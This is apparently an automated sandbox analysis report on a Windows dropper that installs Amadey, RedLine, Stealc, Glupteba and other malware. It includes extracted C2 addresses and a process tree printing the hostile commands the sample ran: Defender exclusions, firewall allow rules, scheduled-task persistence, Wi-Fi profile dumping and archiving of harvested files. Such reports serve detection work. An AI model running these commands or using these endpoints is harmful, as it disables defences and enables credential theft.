Analysis

  • max time kernel
    50s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-04-2024 20:50

General

  • Target

    ef61922fc8f10e302e7b0ff0f958a569c0655f2389cde6020ada1590240478c7.exe

  • Size

    1.8MB

  • MD5

    69e922dc905209056ccc16f9d3be8ef3

  • SHA1

    04159c1b4a065c73a2c315869a5db6c2340b8b6f

  • SHA256

    ef61922fc8f10e302e7b0ff0f958a569c0655f2389cde6020ada1590240478c7

  • SHA512

    7cff6fe27ff6cbe9f32c48d5f1a76ff11512b74985da5547d3aa6deca9468e37ec084198dd831cd2c2a9c3686bf328827487e782beb184a9a686b4cc3b6af01a

  • SSDEEP

    49152:tIhROhJM75fn0C1bB1ZKzfmBS6oU4ieA3b7:2h8hCZ04izRTzieE7

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

Attributes
  • url_path

    /c73eed764cc59dcb.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 4 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 14 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ef61922fc8f10e302e7b0ff0f958a569c0655f2389cde6020ada1590240478c7.exe
    "C:\Users\Admin\AppData\Local\Temp\ef61922fc8f10e302e7b0ff0f958a569c0655f2389cde6020ada1590240478c7.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:4668
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
      "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:4872
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 884
          3⤵
          • Program crash
          PID:3640
      • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
        "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4444
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3824
          • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:972
          • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:4940
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 364
          3⤵
          • Program crash
          PID:3604
      • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
        "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:3972
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 400
            3⤵
            • Program crash
            PID:2508
        • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
          "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4328
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
            3⤵
            • Creates scheduled task(s)
            PID:2784
          • C:\Users\Admin\AppData\Local\Temp\1000218001\ISetup8.exe
            "C:\Users\Admin\AppData\Local\Temp\1000218001\ISetup8.exe"
            3⤵
            • Executes dropped EXE
            PID:352
            • C:\Users\Admin\AppData\Local\Temp\u9s.0.exe
              "C:\Users\Admin\AppData\Local\Temp\u9s.0.exe"
              4⤵
              • Executes dropped EXE
              PID:872
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 872 -s 1096
                5⤵
                • Program crash
                PID:4988
            • C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
              "C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
              4⤵
                PID:4540
                • C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                  C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                  5⤵
                    PID:3616
                    • C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                      C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                      6⤵
                        PID:5108
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\SysWOW64\cmd.exe
                          7⤵
                            PID:4924
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              8⤵
                                PID:3040
                      • C:\Users\Admin\AppData\Local\Temp\u9s.1.exe
                        "C:\Users\Admin\AppData\Local\Temp\u9s.1.exe"
                        4⤵
                          PID:4332
                          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                            5⤵
                              PID:5140
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 696
                            4⤵
                            • Program crash
                            PID:3172
                        • C:\Users\Admin\AppData\Local\Temp\1000219001\toolspub1.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000219001\toolspub1.exe"
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          PID:1704
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 388
                            4⤵
                            • Program crash
                            PID:2792
                      • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:3380
                      • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:1380
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          3⤵
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2424
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                        2⤵
                        • Loads dropped DLL
                        PID:3856
                        • C:\Windows\system32\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4112
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profiles
                            4⤵
                              PID:2008
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\777591257247_Desktop.zip' -CompressionLevel Optimal
                              4⤵
                                PID:2612
                          • C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1128
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ey25wlba\ey25wlba.cmdline"
                              3⤵
                                PID:2908
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3505.tmp" "c:\Users\Admin\AppData\Local\Temp\ey25wlba\CSC5B69C93046C44CAC82CCA39E72F258E.TMP"
                                  4⤵
                                    PID:3764
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
                                  3⤵
                                    PID:1952
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                    3⤵
                                      PID:4740
                                      • C:\Users\Admin\Pictures\PIGAHxGe2PbxS5e6f1KRsKtL.exe
                                        "C:\Users\Admin\Pictures\PIGAHxGe2PbxS5e6f1KRsKtL.exe"
                                        4⤵
                                          PID:4896
                                          • C:\Users\Admin\AppData\Local\Temp\u3s0.0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\u3s0.0.exe"
                                            5⤵
                                              PID:2292
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 1096
                                                6⤵
                                                • Program crash
                                                PID:4892
                                            • C:\Users\Admin\AppData\Local\Temp\u3s0.1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\u3s0.1.exe"
                                              5⤵
                                                PID:5156
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 972
                                                5⤵
                                                • Program crash
                                                PID:5296
                                            • C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe
                                              "C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"
                                              4⤵
                                                PID:2616
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  5⤵
                                                    PID:1188
                                                  • C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe
                                                    "C:\Users\Admin\Pictures\c60PHerJOpPIJ0qXm2jrdNh4.exe"
                                                    5⤵
                                                      PID:5972
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        6⤵
                                                          PID:5500
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                          6⤵
                                                            PID:3576
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                              7⤵
                                                              • Modifies Windows Firewall
                                                              PID:3336
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            6⤵
                                                              PID:2236
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              6⤵
                                                                PID:3780
                                                              • C:\Windows\rss\csrss.exe
                                                                C:\Windows\rss\csrss.exe
                                                                6⤵
                                                                  PID:5876
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -nologo -noprofile
                                                                    7⤵
                                                                      PID:1380
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                      7⤵
                                                                      • Creates scheduled task(s)
                                                                      PID:5044
                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                      schtasks /delete /tn ScheduledUpdate /f
                                                                      7⤵
                                                                        PID:5616
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -nologo -noprofile
                                                                        7⤵
                                                                          PID:5716
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -nologo -noprofile
                                                                          7⤵
                                                                            PID:5952
                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                            7⤵
                                                                              PID:1872
                                                                      • C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe
                                                                        "C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"
                                                                        4⤵
                                                                          PID:5112
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -nologo -noprofile
                                                                            5⤵
                                                                              PID:1852
                                                                            • C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe
                                                                              "C:\Users\Admin\Pictures\4odFPgou1NdrXX1AEvintttJ.exe"
                                                                              5⤵
                                                                                PID:5880
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -nologo -noprofile
                                                                                  6⤵
                                                                                    PID:5208
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                                    6⤵
                                                                                      PID:2724
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                        7⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:5620
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -nologo -noprofile
                                                                                      6⤵
                                                                                        PID:5876
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -nologo -noprofile
                                                                                        6⤵
                                                                                          PID:5780
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 784
                                                                                        5⤵
                                                                                        • Program crash
                                                                                        PID:5924
                                                                                    • C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe
                                                                                      "C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe"
                                                                                      4⤵
                                                                                        PID:1648
                                                                                      • C:\Users\Admin\Pictures\NNCOsc0vdMxEbZzlFP8211Wx.exe
                                                                                        "C:\Users\Admin\Pictures\NNCOsc0vdMxEbZzlFP8211Wx.exe"
                                                                                        4⤵
                                                                                          PID:3408
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS7431.tmp\Install.exe
                                                                                            .\Install.exe /nxdidQZJ "385118" /S
                                                                                            5⤵
                                                                                              PID:1736
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                6⤵
                                                                                                  PID:5048
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                    7⤵
                                                                                                      PID:3336
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                        8⤵
                                                                                                          PID:2236
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                            9⤵
                                                                                                              PID:4932
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 20:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\Jkgzmof.exe\" em /Ivsite_idWNU 385118 /S" /V1 /F
                                                                                                        6⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:4016
                                                                                                  • C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe
                                                                                                    "C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --silent --allusers=0
                                                                                                    4⤵
                                                                                                      PID:592
                                                                                                      • C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe
                                                                                                        C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6ae6e1d0,0x6ae6e1dc,0x6ae6e1e8
                                                                                                        5⤵
                                                                                                          PID:3116
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\36y0Ywm7mT9F0RMTmnGvTs2k.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --version
                                                                                                          5⤵
                                                                                                            PID:3712
                                                                                                          • C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe
                                                                                                            "C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=592 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240423205206" --session-guid=5c166f67-d608-409b-85b3-0e72b00f4c2f --server-tracking-blob="ODBiMDRjYzQ3NWJiMWVmYTE2MjIzMWEzMDIxM2JkYWMzMGIxNTI4YjIwMWI3N2JmZDU3MzhjNjIxMDBmZTc0OTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzOTA1NDg0LjA1MjUiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYzc2NTMzZjMtYTViNi00MWNhLTg0ZWItZjUwNzdhNmFkZGRjIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=8005000000000000
                                                                                                            5⤵
                                                                                                              PID:5268
                                                                                                              • C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe
                                                                                                                C:\Users\Admin\Pictures\36y0Ywm7mT9F0RMTmnGvTs2k.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x691ce1d0,0x691ce1dc,0x691ce1e8
                                                                                                                6⤵
                                                                                                                  PID:5384
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232052061\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232052061\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                                                                                                5⤵
                                                                                                                  PID:5696
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232052061\assistant\assistant_installer.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232052061\assistant\assistant_installer.exe" --version
                                                                                                                  5⤵
                                                                                                                    PID:680
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232052061\assistant\assistant_installer.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232052061\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x10f6038,0x10f6044,0x10f6050
                                                                                                                      6⤵
                                                                                                                        PID:2200
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4564
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
                                                                                                                  3⤵
                                                                                                                    PID:4860
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      Sc delete GameServerClient
                                                                                                                      4⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3056
                                                                                                                    • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                      GameService remove GameServerClient confirm
                                                                                                                      4⤵
                                                                                                                        PID:3808
                                                                                                                      • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                        GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
                                                                                                                        4⤵
                                                                                                                          PID:3088
                                                                                                                        • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                          GameService start GameServerClient
                                                                                                                          4⤵
                                                                                                                            PID:4456
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
                                                                                                                          3⤵
                                                                                                                            PID:2456
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              Sc delete GameServerClientC
                                                                                                                              4⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3356
                                                                                                                            • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                              GameService remove GameServerClientC confirm
                                                                                                                              4⤵
                                                                                                                                PID:3776
                                                                                                                              • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
                                                                                                                                4⤵
                                                                                                                                  PID:3704
                                                                                                                                • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                  GameService start GameServerClientC
                                                                                                                                  4⤵
                                                                                                                                    PID:3616
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                                                                  3⤵
                                                                                                                                    PID:4392
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
